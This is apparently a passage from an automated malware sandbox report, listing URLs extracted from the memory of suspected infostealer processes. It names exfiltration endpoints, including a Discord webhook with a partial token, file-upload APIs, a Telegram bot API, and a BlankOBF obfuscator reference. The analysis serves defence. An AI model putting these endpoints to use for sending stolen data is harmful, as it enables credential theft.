                                  Source: based.exe, 00000004.00000003.1871128429.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382843962.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359818591.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380585995.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380067127.00000201D0905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                  Source: based.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                  Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1672326950.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670882598.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                  Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                                  Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                  Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: based.exe, 00000004.00000003.2380504617.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1871128429.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1858412342.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2378136053.00000201D0929000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1763481710.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359523519.00000201D0929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                  Source: based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftCHROME~2.TXTy./
                                  Source: based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftISPLA~1.PNGy.
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: based.exe, 00000004.00000002.2387954402.00000201D1C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                                  Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                                  Source: based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadrU
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                                  Source: based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;
                                  Source: based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;r
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                  Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                                  Source: based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                  Source: based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                                  Source: based.exe, 00000004.00000003.1697774111.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698372056.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697774111.00000201D075D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1699291343.00000201D07D4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697523584.00000201D0948000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698004451.00000201D07C8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1701839731.00000201D07D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                                  Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                  Source: hacn.exe, 00000003.00000002.1704402045.000002075C83C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381279282.00000201CFC48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                  Source: based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                  Source: hacn.exe, 00000003.00000003.1699100355.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1700843802.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690999931.000002075AFE3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1696726978.000002075AFD9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701432370.000002075AFFC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698584471.000002075AFEC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697785294.000002075AFE9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704358371.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701967125.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                  Source: hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 